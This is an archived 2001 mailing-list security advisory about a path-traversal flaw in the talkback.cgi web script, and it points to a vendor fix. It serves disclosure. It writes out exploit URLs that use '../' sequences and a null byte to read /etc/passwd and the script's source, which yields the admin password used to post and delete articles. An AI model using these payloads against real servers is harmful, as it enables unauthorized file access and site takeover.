OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Stan (stanWHIZKUNDE.ORG)
Date: Mon Apr 09 2001 - 10:44:23 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    [whizkunde security advisory: talkback (CGI)]
    http://www.whizkunde.org | stanwhizkunde.org

    ----------------------------------------------------------
    Release date: April 9th 2001
    Subject: talkback.cgi security problem
    Systems affected: UNIX systems running talkback CGI script
    Vendor: http://www.waytotheweb.com
    ----------------------------------------------------------

    1. problem
    Talkback.cgi may allow remote users (website visitors) to
    view any file on a webserver (depending on the user the
    webserver is running on).

    Regard this URL:

    http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
    ../../../../../../../../etc/passwd%00&action=view&matchview=1

    This will display the /etc/passwd (if the webserver user has
    access to this file).

    Another URL can display the source of talkback.cgi itself
    that contains the admin password:

    http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
    ../cgi-bin/talkback.cgi%00&action=view&matchview=1

    (You might have to use another URL instead of
    ../cgi-bin/talkback.cgi%00, this depends on where the
    cgi-bin is installed.)

    In this file you can find $admin_password that can be used in

    http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

    to post & delete articles.

    2. fix
    Way To The Web has released an updated version of
    talkback.cgi that isn't vulnerable to this problem:

    http://www.waytotheweb.com/webscripts/talkback.htm

    ----------------------------------------------------------
    Stan a.k.a. ThePike
    stanwhizkunde.org
    http://www.whizkunde.org

    Copyright whizkunde security team 2001